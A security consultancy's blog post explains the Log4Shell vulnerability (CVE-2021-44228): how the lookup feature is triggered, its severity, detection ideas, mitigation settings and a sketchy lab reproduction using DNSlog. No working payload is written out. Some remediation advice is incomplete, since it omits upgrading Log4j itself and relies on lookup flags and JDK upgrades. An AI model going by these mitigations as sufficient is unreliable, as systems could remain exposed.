3WaySecure Consulting

03.30.2022
Vulnerability Analysis: Log4j (CVE-2021-44228)

Introduction:

On December 10, 2021 details of the Apache Open-Source Project Log4j Remote Code Execution Vulnerability CVE-2021-44228 were made public. It was called Log4Shell (CVE-2021-44228) and it allows an attacker to execute arbitrary code on a target server. It is considered very serious for the following reasons – it is simple to exploit, upon exploitation an attacker could get full access to a server, and the ability of the vulnerability to easily affect millions of devices, due to the widespread use of Log4j. Adobe, IBM, Broadcom, VMware are some of the vendors who were impacted by this vulnerability.

Log4j2 is an upgraded version of Log4j, the open-source logging component of Apache. Rich feature set was introduced by rewriting Log4j. This log component is used to record log information in program input and output, and it is widely used in business system development. There is a Lookup function in Log4j2, which allows developers to read the configuration in the corresponding environment through some protocols. This vulnerability is triggered when the program logs user-entered data in a log. An attacker can use the content of the keyword as a variable to replace the attack command if the log content contains the keyword “${“

Severity Score

              In the Vulnerability Score Database “NATIONAL VULNERABILITY DATABASE”, this vulnerability has a score of 10.0. 10.0 is the highest score, meaning that this vulnerability has the highest level of severity.

Detecting Log4j attacks

Log4j attacks can be detected at various stages of the attack.

1. IPS signatures can be updated to detect JNDI payload.

2. SIEM devices can be used for performing log inspection.

3. Antimalware solutions can be used to prevent from downloading and installing of ransomwares

How to identify if your organization needs to take action

1. If your organization has Log4j as part of a running application or service that is exposed to a network, which can be used as a vector to launch the attack. This network can be either an internal network or an external network, like the internet.

2. If your organization does not have the application Log4j running, but it is being used for processing or back-ups, your systems are vulnerable and could be attacked.

Solution

1. Set configuration parameters: log4j2.formatMsgNoLookups=true

2. Modify JVM parameters: -Dlog4j2.formatMsgNoLookups=true

3. Modify the system environment variable: FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS is set to true

4. Prohibit external connection to the server where log4j2 is located

5. Upgrade the jdk version to 6u211 / 7u201 / 8u191 / 11.0.1 or above

If you want to go a step further and want to reproduce the vulnerability

First, download the vulnerability environment using docker in kali

Use ip address and port 8983 to view it on the browser.

Apply a temporary Dnslog on website

Upon clicking “Refresh Record”, java version appears in “Dns query Record”.

Recent Vulnerabilities

No Results Found

The page you requested could not be found. Try refining your search, or use the navigation above to locate the post.

Get A Free Consultation

Learn more about our services and solutions to protect your business.